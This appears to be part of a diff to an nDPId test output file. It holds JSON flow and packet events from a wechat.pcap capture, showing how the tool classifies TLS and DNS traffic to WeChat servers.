+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1492167720353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720353,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8TqBAAEAGxpzAqAFny82XotNoAbuP9m4OAAAAAKACchC8ZwAAAgQFtAQCCAoAMiCuAAAAAAEDAwc="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1492167720458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720458,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702cUBmdaEflnrqASN8gU+wAAAgQFoAQCCApFrqVHADIgbwEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1492167720458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167720458,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R8NAAEAGzYHAqAFny82XotNnAbsR+WeuFAZnW4AQAOV6PQAAAQEICgAyIMhFrqVH"} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720101,"flow_last_seen":1492167720458,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167720458,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1135,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1492167720700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720700,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702hvZooej\/ZuD6ASN8iscAAAAgQFoAQCCApF0wrqADIgrgEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1492167720700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167720700,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0TqFAAEAGxqPAqAFny82XotNoAbuP9m4Pb2aKH4AQAOURtQAAAQEICgAyIQVF0wrq"} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1138,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1140,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1159,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720353,"flow_last_seen":1492167722010,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167722010,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1166,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720353,"flow_last_seen":1492167722364,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167722364,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01436{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1168,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167720353,"flow_last_seen":1492167722365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167722365,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617598,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167749276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617598,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167749276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617562,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167749276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617562,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167749276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765155,"flow_last_seen":1492167765155,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492167765155,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1492167765155,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765155,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8EUFAAEARpLrAqAFnwKgB\/uvEADUAKLhvU\/MBAAABAAAAAAAAA3dlYgZ3ZWNoYXQDY29tAAABAAE="} 00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765155,"flow_last_seen":1492167765155,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492167765155,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1492167765432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":391,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":391,"pkt_l4_len":357,"thread_ts_msec":1492167765432,"pkt":"eJKcD6iO8IQvSpdgCABFoAF5AABAAEARtB7AqAH+wKgBZwA168QBZQj\/U\/OBgAABAAMABAALA3dlYgZ3ZWNoYXQDY29tAAABAAHADAAFAAEAAAJYAAcEd2ViMcAQwCwAAQABAAACWAAEy82Tq8AsAAEAAQAAAlgABMvNl6LALAACAAEAAU8CAA0HbnMtdGVsMQJxccAXwCwAAgABAAFPAgAKB25zLWNuYzHAZ8AsAAIAAQABTwIACQZucy1vczHAZ8AsAAIAAQABTwIACgducy1jbW4xwGfAjgABAAEAAAFuAAS4ac55wI4AAQABAAABbgAEy82TmMCOAAEAAQAAAW4ABMvNsDrAjgABAAEAAAFuAARnBx7vwKMAAQABAAANPgAEtv5vZMCjAAEAAQAADT4ABLfoeDvAowABAAEAAA0+AAS2\/hBmwHgAAQABAAABmAAEb6Frw8B4AAEAAQAAAZgABG+haBHAXwABAAEAAAFuAAS2jLiMwF8AAQABAAABbgAEtwK6mQ=="} 00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167765155,"flow_last_seen":1492167765432,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1492167765432,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"web.wechat.com","num_queries":1,"num_answers":18,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.147.171"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765433,"flow_last_seen":1492167765433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167765433,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1492167765433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765433,"pkt":"8IQvSpdgeJKcD6iOCABFAAA88RZAAEAGKB3AqAFny82Tq+K0AbvYTb2iAAAAAKACchDtIAAAAgQFtAQCCAoAMky0AAAAAAEDAwc="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1221,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765657,"flow_last_seen":1492167765657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167765657,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1492167765657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765657,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8ZwNAAEAGsjDAqAFny82Tq+K1Abs3CyvvAAAAAKACchAf3gAAAgQFtAQCCAoAMkzsAAAAAAEDAwc="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1492167765701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765701,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rSlk19z2E29o6ASN8g4AQAAAgQFoAQCCApF8qRxADJMtAEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1492167765701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167765701,"pkt":"8IQvSpdgeJKcD6iOCABFAAA08RdAAEAGKCTAqAFny82Tq+K0AbvYTb2jpZNfdIAQAOWdWQAAAQEICgAyTPdF8qRx"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167765433,"flow_last_seen":1492167765701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167765701,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1225,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1492167765933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765933,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rU+QocNNwsr8KASN8h9cwAAAgQFoAQCCApFrtG3ADJM7AEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1226,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1492167765933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167765933,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ZwRAAEAGsjfAqAFny82Tq+K1Abs3CyvwPkKHDoAQAOXiyQAAAQEICgAyTTFFrtG3"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167617248,"flow_last_seen":1492167640200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167617498,"flow_last_seen":1492167640214,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167617498,"flow_last_seen":1492167640214,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1258,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167776953,"flow_last_seen":1492167776953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167776953,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1258,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1492167776953,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167776953,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8k9VAAEAGhV7AqAFny82Tq+K2AbuZa8QhAAAAAKACchAaQgAAAgQFtAQCCAoAMlf0AAAAAAEDAwc="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1259,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167777204,"flow_last_seen":1492167777204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167777204,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 